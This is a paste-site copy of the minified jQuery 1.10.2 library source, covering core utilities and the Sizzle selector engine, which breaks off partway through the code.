· 7 years ago · Nov 08, 2017, 02:08 PM
1/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license
2//@ sourceMappingURL=jquery-1.10.2.min.map
3*/
4(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x,init:function(e,n,r){var i,o;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof x?n[0]:n,x.merge(this,x.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:a,!0)),k.test(i[1])&&x.isPlainObject(n))for(i in n)x.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(o=a.getElementById(i[2]),o&&o.parentNode){if(o.id!==i[2])return r.find(e);this.length=1,this[0]=o}return this.context=a,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):x.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),x.makeArray(e,this))},selector:"",length:0,toArray:function(){return g.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=x.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e,t){return x.each(this,e,t)},ready:function(e){return x.ready.promise().done(e),this},slice:function(){return this.pushStack(g.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(x.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:h,sort:[].sort,splice:[].splice},x.fn.init.prototype=x.fn,x.extend=x.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},l=1,u=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},l=2),"object"==typeof s||x.isFunction(s)||(s={}),u===l&&(s=this,--l);u>l;l++)if(null!=(o=arguments[l]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(x.isPlainObject(r)||(n=x.isArray(r)))?(n?(n=!1,a=e&&x.isArray(e)?e:[]):a=e&&x.isPlainObject(e)?e:{},s[i]=x.extend(c,a,r)):r!==t&&(s[i]=r));return s},x.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),noConflict:function(t){return e.$===x&&(e.$=u),t&&e.jQuery===x&&(e.jQuery=l),x},isReady:!1,readyWait:1,holdReady:function(e){e?x.readyWait++:x.ready(!0)},ready:function(e){if(e===!0?!--x.readyWait:!x.isReady){if(!a.body)return setTimeout(x.ready);x.isReady=!0,e!==!0&&--x.readyWait>0||(n.resolveWith(a,[x]),x.fn.trigger&&x(a).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===x.type(e)},isArray:Array.isArray||function(e){return"array"===x.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?c[y.call(e)]||"object":typeof e},isPlainObject:function(e){var n;if(!e||"object"!==x.type(e)||e.nodeType||x.isWindow(e))return!1;try{if(e.constructor&&!v.call(e,"constructor")&&!v.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}if(x.support.ownLast)for(n in e)return v.call(e,n);for(n in e);return n===t||v.call(e,n)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||a;var r=k.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=x.buildFragment([e],t,i),i&&x(i).remove(),x.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=x.trim(n),n&&E.test(n.replace(A,"@").replace(j,"]").replace(S,"")))?Function("return "+n)():(x.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||x.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&x.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(D,"ms-").replace(L,H)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:b&&!b.call("\ufeff\u00a0")?function(e){return null==e?"":b.call(e)}:function(e){return null==e?"":(e+"").replace(C,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?x.merge(n,"string"==typeof e?[e]:e):h.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(m)return m.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return d.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),x.isFunction(e)?(r=g.call(arguments,2),i=function(){return e.apply(n||this,r.concat(g.call(arguments)))},i.guid=e.guid=e.guid||x.guid++,i):t},access:function(e,n,r,i,o,a,s){var l=0,u=e.length,c=null==r;if("object"===x.type(r)){o=!0;for(l in r)x.access(e,n,l,r[l],!0,a,s)}else if(i!==t&&(o=!0,x.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(x(e),n)})),n))for(;u>l;l++)n(e[l],r,s?i:i.call(e[l],l,n(e[l],r)));return o?e:c?n.call(e):u?n(e[0],r):a},now:function(){return(new Date).getTime()},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),x.ready.promise=function(t){if(!n)if(n=x.Deferred(),"complete"===a.readyState)setTimeout(x.ready);else if(a.addEventListener)a.addEventListener("DOMContentLoaded",q,!1),e.addEventListener("load",q,!1);else{a.attachEvent("onreadystatechange",q),e.attachEvent("onload",q);var r=!1;try{r=null==e.frameElement&&a.documentElement}catch(i){}r&&r.doScroll&&function o(){if(!x.isReady){try{r.doScroll("left")}catch(e){return setTimeout(o,50)}_(),x.ready()}}()}return n.promise(t)},x.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){c["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=x.type(e);return x.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=x(a),function(e,t){var n,r,i,o,a,s,l,u,c,p,f,d,h,g,m,y,v,b="sizzle"+-new Date,w=e.document,T=0,C=0,N=st(),k=st(),E=st(),S=!1,A=function(e,t){return e===t?(S=!0,0):0},j=typeof t,D=1<<31,L={}.hasOwnProperty,H=[],q=H.pop,_=H.push,M=H.push,O=H.slice,F=H.indexOf||function(e){var t=0,n=this.length;for(;n>t;t++)if(this[t]===e)return t;return-1},B="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",R="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",W=R.replace("w","w#"),$="\\["+P+"*("+R+")"+P+"*(?:([*^$|!~]?=)"+P+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+W+")|)|)"+P+"*\\]",I=":("+R+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+$.replace(3,8)+")*)|.*)\\)|)",z=RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),X=RegExp("^"+P+"*,"+P+"*"),U=RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),V=RegExp(P+"*[+~]"),Y=RegExp("="+P+"*([^\\]'\"]*)"+P+"*\\]","g"),J=RegExp(I),G=RegExp("^"+W+"$"),Q={ID:RegExp("^#("+R+")"),CLASS:RegExp("^\\.("+R+")"),TAG:RegExp("^("+R.replace("w","w*")+")"),ATTR:RegExp("^"+$),PSEUDO:RegExp("^"+I),CHILD:RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+P+"*(even|odd|(([+-]|)(\\d*)n|)"+P+"*(?:([+-]|)"+P+"*(\\d+)|))"+P+"*\\)|)","i"),bool:RegExp("^(?:"+B+")$","i"),needsContext:RegExp("^"+P+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+P+"*((?:-\\d)?\\d*)"+P+"*\\)|)(?=[^-]|$)","i")},K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,et=/^(?:input|select|textarea|button)$/i,tt=/^h\d$/i,nt=/'|\\/g,rt=RegExp("\\\\([\\da-f]{1,6}"+P+"?|("+P+")|.)","ig"),it=function(e,t,n){var r="0x"+t-65536;return r!==r||n?t:0>r?String.fromCharCode(r+65536):String.fromCharCode(55296|r>>10,56320|1023&r)};try{M.apply(H=O.call(w.childNodes),w.childNodes),H[w.childNodes.length].nodeType}catch(ot){M={apply:H.length?function(e,t){_.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function at(e,t,n,i){var o,a,s,l,u,c,d,m,y,x;if((t?t.ownerDocument||t:w)!==f&&p(t),t=t||f,n=n||[],!e||"string"!=typeof e)return n;if(1!==(l=t.nodeType)&&9!==l)return[];if(h&&!i){if(o=Z.exec(e))if(s=o[1]){if(9===l){if(a=t.getElementById(s),!a||!a.parentNode)return n;if(a.id===s)return n.push(a),n}else if(t.ownerDocument&&(a=t.ownerDocument.getElementById(s))&&v(t,a)&&a.id===s)return n.push(a),n}else{if(o[2])return M.apply(n,t.getElementsByTagName(e)),n;if((s=o[3])&&r.getElementsByClassName&&t.getElementsByClassName)return M.apply(n,t.getElementsByClassName(s)),n}if(r.qsa&&(!g||!g.test(e))){if(m=d=b,y=t,x=9===l&&e,1===l&&"object"!==t.nodeName.toLowerCase()){c=mt(e),(d=t.getAttribute("id"))?m=d.replace(nt,"\\$&"):t.setAttribute("id",m),m="[id='"+m+"'] ",u=c.length;while(u--)c[u]=m+yt(c[u]);y=V.test(e)&&t.parentNode||t,x=c.join(",")}if(x)try{return M.apply(n,y.querySelectorAll(x)),n}catch(T){}finally{d||t.removeAttribute("id")}}}return kt(e.replace(z,"$1"),t,n,i)}function st(){var e=[];function t(n,r){return e.push(n+=" ")>o.cacheLength&&delete t[e.shift()],t[n]=r}return t}function lt(e){return e[b]=!0,e}function ut(e){var t=f.createElement("div");try{return!!e(t)}catch(n){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function ct(e,t){var n=e.split("|"),r=e.length;while(r--)o.attrHandle[n[r]]=t}function pt(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&(~t.sourceIndex||D)-(~e.sourceIndex||D);if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function ft(e){return function(t){var n=t.nodeName.toLowerCase();return"input"===n&&t.type===e}}function dt(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ht(e){return lt(function(t){return t=+t,lt(function(n,r){var i,o=e([],n.length,t),a=o.length;while(a--)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}s=at.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?"HTML"!==t.nodeName:!1},r=at.support={},p=at.setDocument=function(e){var n=e?e.ownerDocument||e:w,i=n.defaultView;return n!==f&&9===n.nodeType&&n.documentElement?(f=n,d=n.documentElement,h=!s(n),i&&i.attachEvent&&i!==i.top&&i.attachEvent("onbeforeunload",function(){p()}),r.attributes=ut(function(e){return e.className="i",!e.getAttribute("className")}),r.getElementsByTagName=ut(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),r.getElementsByClassName=ut(function(e){return e.innerHTML="<div class='a'></div><div class='a i'></div>",e.firstChild.className="i",2===e.getElementsByClassName("i").length}),r.getById=ut(function(e){return d.appendChild(e).id=b,!n.getElementsByName||!n.getElementsByName(b).length}),r.getById?(o.find.ID=function(e,t){if(typeof t.getElementById!==j&&h){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){return e.getAttribute("id")===t}}):(delete o.find.ID,o.filter.ID=function(e){var t=e.replace(rt,it);return function(e){var n=typeof e.getAttributeNode!==j&&e.getAttributeNode("id");return n&&n.value===t}}),o.find.TAG=r.getElementsByTagName?function(e,n){return typeof n.getElementsByTagName!==j?n.getElementsByTagName(e):t}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return r}return o},o.find.CLASS=r.getElementsByClassName&&function(e,n){return typeof n.getElementsByClassName!==j&&h?n.getElementsByClassName(e):t},m=[],g=[],(r.qsa=K.test(n.querySelectorAll))&&(ut(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||g.push("\\["+P+"*(?:value|"+B+")"),e.querySelectorAll(":checked").length||g.push(":checked")}),ut(function(e){var t=n.createElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("t",""),e.querySelectorAll("[t^='']").length&&g.push("[*^$]="+P+"*(?:''|\"\")"),e.querySelectorAll(":enabled").length||g.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),g.push(",.*:")})),(r.matchesSelector=K.test(y=d.webkitMatchesSelector||d.mozMatchesSelector||d.oMatchesSelector||d.msMatchesSelector))&&ut(function(e){r.disconnectedMatch=y.call(e,"div"),y.call(e,"[s!='']:x"),m.push("!=",I)}),g=g.length&&RegExp(g.join("|")),m=m.length&&RegExp(m.join("|")),v=K.test(d.contains)||d.compareDocumentPosition?function(e,t){var n=9===e.nodeType?e.documentElement:e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},A=d.compareDocumentPosition?function(e,t){if(e===t)return S=!0,0;var i=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t);return i?1&i||!r.sortDetached&&t.compareDocumentPosition(e)===i?e===n||v(w,e)?-1:t===n||v(w,t)?1:c?F.call(c,e)-F.call(c,t):0:4&i?-1:1:e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,o=e.parentNode,a=t.parentNode,s=[e],l=[t];if(e===t)return S=!0,0;if(!o||!a)return e===n?-1:t===n?1:o?-1:a?1:c?F.call(c,e)-F.call(c,t):0;if(o===a)return pt(e,t);r=e;while(r=r.parentNode)s.unshift(r);r=t;while(r=r.parentNode)l.unshift(r);while(s[i]===l[i])i++;return i?pt(s[i],l[i]):s[i]===w?-1:l[i]===w?1:0},n):f},at.matches=function(e,t){return at(e,null,null,t)},at.matchesSelector=function(e,t){if((e.ownerDocument||e)!==f&&p(e),t=t.replace(Y,"='$1']"),!(!r.matchesSelector||!h||m&&m.test(t)||g&&g.test(t)))try{var n=y.call(e,t);if(n||r.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(i){}return at(t,f,null,[e]).length>0},at.contains=function(e,t){return(e.ownerDocument||e)!==f&&p(e),v(e,t)},at.attr=function(e,n){(e.ownerDocument||e)!==f&&p(e);var i=o.attrHandle[n.toLowerCase()],a=i&&L.call(o.attrHandle,n.toLowerCase())?i(e,n,!h):t;return a===t?r.attributes||!h?e.getAttribute(n):(a=e.getAttributeNode(n))&&a.specified?a.value:null:a},at.error=function(e){throw Error("Syntax error, unrecognized expression: "+e)},at.uniqueSort=function(e){var t,n=[],i=0,o=0;if(S=!r.detectDuplicates,c=!r.sortStable&&e.slice(0),e.sort(A),S){while(t=e[o++])t===e[o]&&(i=n.push(o));while(i--)e.splice(n[i],1)}return e},a=at.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=a(e)}else if(3===i||4===i)return e.nodeValue}else for(;t=e[r];r++)n+=a(t);return n},o=at.selectors={cacheLength:50,createPseudo:lt,match:Q,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(rt,it),e[3]=(e[4]||e[5]||"").replace(rt,it),"~="===e[2]&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),"nth"===e[1].slice(0,3)?(e[3]||at.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*("even"===e[3]||"odd"===e[3])),e[5]=+(e[7]+e[8]||"odd"===e[3])):e[3]&&at.error(e[0]),e},PSEUDO:function(e){var n,r=!e[5]&&e[2];return Q.CHILD.test(e[0])?null:(e[3]&&e[4]!==t?e[2]=e[4]:r&&J.test(r)&&(n=mt(r,!0))&&(n=r.indexOf(")",r.length-n)-r.length)&&(e[0]=e[0].slice(0,n),e[2]=r.slice(0,n)),e.slice(0,3))}},filter:{TAG:function(e){var t=e.replace(rt,it).toLowerCase();return"*"===e?function(){return!0}:function(e){return e.nodeName&&e.nodeName.toLowerCase()===t}},CLASS:function(e){var t=N[e+" "];return t||(t=RegExp("(^|"+P+")"+e+"("+P+"|$)"))&&N(e,function(e){return t.test("string"==typeof e.className&&e.className||typeof e.getAttribute!==j&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=at.attr(r,e);return null==i?"!="===t:t?(i+="","="===t?i===n:"!="===t?i!==n:"^="===t?n&&0===i.indexOf(n):"*="===t?n&&i.indexOf(n)>-1:"$="===t?n&&i.slice(-n.length)===n:"~="===t?(" "+i+" ").indexOf(n)>-1:"|="===t?i===n||i.slice(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var o="nth"!==e.slice(0,3),a="last"!==e.slice(-4),s="of-type"===t;return 1===r&&0===i?function(e){return!!e.parentNode}:function(t,n,l){var u,c,p,f,d,h,g=o!==a?"nextSibling":"previousSibling",m=t.parentNode,y=s&&t.nodeName.toLowerCase(),v=!l&&!s;if(m){if(o){while(g){p=t;while(p=p[g])if(s?p.nodeName.toLowerCase()===y:1===p.nodeType)return!1;h=g="only"===e&&!h&&"nextSibling"}return!0}if(h=[a?m.firstChild:m.lastChild],a&&v){c=m[b]||(m[b]={}),u=c[e]||[],d=u[0]===T&&u[1],f=u[0]===T&&u[2],p=d&&m.childNodes[d];while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if(1===p.nodeType&&++f&&p===t){c[e]=[T,d,f];break}}else if(v&&(u=(t[b]||(t[b]={}))[e])&&u[0]===T)f=u[1];else while(p=++d&&p&&p[g]||(f=d=0)||h.pop())if((s?p.nodeName.toLowerCase()===y:1===p.nodeType)&&++f&&(v&&((p[b]||(p[b]={}))[e]=[T,f]),p===t))break;return f-=i,f===r||0===f%r&&f/r>=0}}},PSEUDO:function(e,t){var n,r=o.pseudos[e]||o.setFilters[e.toLowerCase()]||at.error("unsupported pseudo: "+e);return r[b]?r(t):r.length>1?(n=[e,e,"",t],o.setFilters.hasOwnProperty(e.toLowerCase())?lt(function(e,n){var i,o=r(e,t),a=o.length;while(a--)i=F.call(e,o[a]),e[i]=!(n[i]=o[a])}):function(e){return r(e,0,n)}):r}},pseudos:{not:lt(function(e){var t=[],n=[],r=l(e.replace(z,"$1"));return r[b]?lt(function(e,t,n,i){var o,a=r(e,null,i,[]),s=e.length;while(s--)(o=a[s])&&(e[s]=!(t[s]=o))}):function(e,i,o){return t[0]=e,r(t,null,o,n),!n.pop()}}),has:lt(function(e){return function(t){return at(e,t).length>0}}),contains:lt(function(e){return function(t){return(t.textContent||t.innerText||a(t)).indexOf(e)>-1}}),lang:lt(function(e){return G.test(e||"")||at.error("unsupported lang: "+e),e=e.replace(rt,it).toLowerCase(),function(t){var n;do if(n=h?t.lang:t.getAttribute("xml:lang")||t.getAttribute("lang"))return n=n.toLowerCase(),n===e||0===n.indexOf(e+"-");while((t=t.parentNode)&&1===t.nodeType);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===d},focus:function(e){return e===f.activeElement&&(!f.hasFocus||f.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&!!e.checked||"option"===t&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||3===e.nodeType||4===e.nodeType)return!1;return!0},parent:function(e){return!o.pseudos.empty(e)},header:function(e){return tt.test(e.nodeName)},input:function(e){return et.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return"input"===t&&"button"===e.type||"button"===t},text:function(e){var t;return"input"===e.nodeName.toLowerCase()&&"text"===e.type&&(null==(t=e.getAttribute("type"))||t.toLowerCase()===e.type)},first:ht(function(){return[0]}),last:ht(function(e,t){return[t-1]}),eq:ht(function(e,t,n){return[0>n?n+t:n]}),even:ht(function(e,t){var n=0;for(;t>n;n+=2)e.push(n);return e}),odd:ht(function(e,t){var n=1;for(;t>n;n+=2)e.push(n);return e}),lt:ht(function(e,t,n){var r=0>n?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ht(function(e,t,n){var r=0>n?n+t:n;for(;t>++r;)e.push(r);return e})}},o.pseudos.nth=o.pseudos.eq;for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})o.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})o.pseudos[n]=dt(n);function gt(){}gt.prototype=o.filters=o.pseudos,o.setFilters=new gt;function mt(e,t){var n,r,i,a,s,l,u,c=k[e+" "];if(c)return t?0:c.slice(0);s=e,l=[],u=o.preFilter;while(s){(!n||(r=X.exec(s)))&&(r&&(s=s.slice(r[0].length)||s),l.push(i=[])),n=!1,(r=U.exec(s))&&(n=r.shift(),i.push({value:n,type:r[0].replace(z," ")}),s=s.slice(n.length));for(a in o.filter)!(r=Q[a].exec(s))||u[a]&&!(r=u[a](r))||(n=r.shift(),i.push({value:n,type:a,matches:r}),s=s.slice(n.length));if(!n)break}return t?s.length:s?at.error(e):k(e,l).slice(0)}function yt(e){var t=0,n=e.length,r="";for(;n>t;t++)r+=e[t].value;return r}function vt(e,t,n){var r=t.dir,o=n&&"parentNode"===r,a=C++;return t.first?function(t,n,i){while(t=t[r])if(1===t.nodeType||o)return e(t,n,i)}:function(t,n,s){var l,u,c,p=T+" "+a;if(s){while(t=t[r])if((1===t.nodeType||o)&&e(t,n,s))return!0}else while(t=t[r])if(1===t.nodeType||o)if(c=t[b]||(t[b]={}),(u=c[r])&&u[0]===p){if((l=u[1])===!0||l===i)return l===!0}else if(u=c[r]=[p],u[1]=e(t,n,s)||i,u[1]===!0)return!0}}function bt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function xt(e,t,n,r,i){var o,a=[],s=0,l=e.length,u=null!=t;for(;l>s;s++)(o=e[s])&&(!n||n(o,r,i))&&(a.push(o),u&&t.push(s));return a}function wt(e,t,n,r,i,o){return r&&!r[b]&&(r=wt(r)),i&&!i[b]&&(i=wt(i,o)),lt(function(o,a,s,l){var u,c,p,f=[],d=[],h=a.length,g=o||Nt(t||"*",s.nodeType?[s]:s,[]),m=!e||!o&&t?g:xt(g,f,e,s,l),y=n?i||(o?e:h||r)?[]:a:m;if(n&&n(m,y,s,l),r){u=xt(y,d),r(u,[],s,l),c=u.length;while(c--)(p=u[c])&&(y[d[c]]=!(m[d[c]]=p))}if(o){if(i||e){if(i){u=[],c=y.length;while(c--)(p=y[c])&&u.push(m[c]=p);i(null,y=[],u,l)}c=y.length;while(c--)(p=y[c])&&(u=i?F.call(o,p):f[c])>-1&&(o[u]=!(a[u]=p))}}else y=xt(y===a?y.splice(h,y.length):y),i?i(null,a,y,l):M.apply(a,y)})}function Tt(e){var t,n,r,i=e.length,a=o.relative[e[0].type],s=a||o.relative[" "],l=a?1:0,c=vt(function(e){return e===t},s,!0),p=vt(function(e){return F.call(t,e)>-1},s,!0),f=[function(e,n,r){return!a&&(r||n!==u)||((t=n).nodeType?c(e,n,r):p(e,n,r))}];for(;i>l;l++)if(n=o.relative[e[l].type])f=[vt(bt(f),n)];else{if(n=o.filter[e[l].type].apply(null,e[l].matches),n[b]){for(r=++l;i>r;r++)if(o.relative[e[r].type])break;return wt(l>1&&bt(f),l>1&&yt(e.slice(0,l-1).concat({value:" "===e[l-2].type?"*":""})).replace(z,"$1"),n,r>l&&Tt(e.slice(l,r)),i>r&&Tt(e=e.slice(r)),i>r&&yt(e))}f.push(n)}return bt(f)}function Ct(e,t){var n=0,r=t.length>0,a=e.length>0,s=function(s,l,c,p,d){var h,g,m,y=[],v=0,b="0",x=s&&[],w=null!=d,C=u,N=s||a&&o.find.TAG("*",d&&l.parentNode||l),k=T+=null==C?1:Math.random()||.1;for(w&&(u=l!==f&&l,i=n);null!=(h=N[b]);b++){if(a&&h){g=0;while(m=e[g++])if(m(h,l,c)){p.push(h);break}w&&(T=k,i=++n)}r&&((h=!m&&h)&&v--,s&&x.push(h))}if(v+=b,r&&b!==v){g=0;while(m=t[g++])m(x,y,l,c);if(s){if(v>0)while(b--)x[b]||y[b]||(y[b]=q.call(p));y=xt(y)}M.apply(p,y),w&&!s&&y.length>0&&v+t.length>1&&at.uniqueSort(p)}return w&&(T=k,u=C),x};return r?lt(s):s}l=at.compile=function(e,t){var n,r=[],i=[],o=E[e+" "];if(!o){t||(t=mt(e)),n=t.length;while(n--)o=Tt(t[n]),o[b]?r.push(o):i.push(o);o=E(e,Ct(i,r))}return o};function Nt(e,t,n){var r=0,i=t.length;for(;i>r;r++)at(e,t[r],n);return n}function kt(e,t,n,i){var a,s,u,c,p,f=mt(e);if(!i&&1===f.length){if(s=f[0]=f[0].slice(0),s.length>2&&"ID"===(u=s[0]).type&&r.getById&&9===t.nodeType&&h&&o.relative[s[1].type]){if(t=(o.find.ID(u.matches[0].replace(rt,it),t)||[])[0],!t)return n;e=e.slice(s.shift().value.length)}a=Q.needsContext.test(e)?0:s.length;while(a--){if(u=s[a],o.relative[c=u.type])break;if((p=o.find[c])&&(i=p(u.matches[0].replace(rt,it),V.test(s[0].type)&&t.parentNode||t))){if(s.splice(a,1),e=i.length&&yt(s),!e)return M.apply(n,i),n;break}}}return l(e,f)(i,t,!h,n,V.test(e)),n}r.sortStable=b.split("").sort(A).join("")===b,r.detectDuplicates=S,p(),r.sortDetached=ut(function(e){return 1&e.compareDocumentPosition(f.createElement("div"))}),ut(function(e){return e.innerHTML="<a href='#'></a>","#"===e.firstChild.getAttribute("href")})||ct("type|href|height|width",function(e,n,r){return r?t:e.getAttribute(n,"type"===n.toLowerCase()?1:2)}),r.attributes&&ut(function(e){return 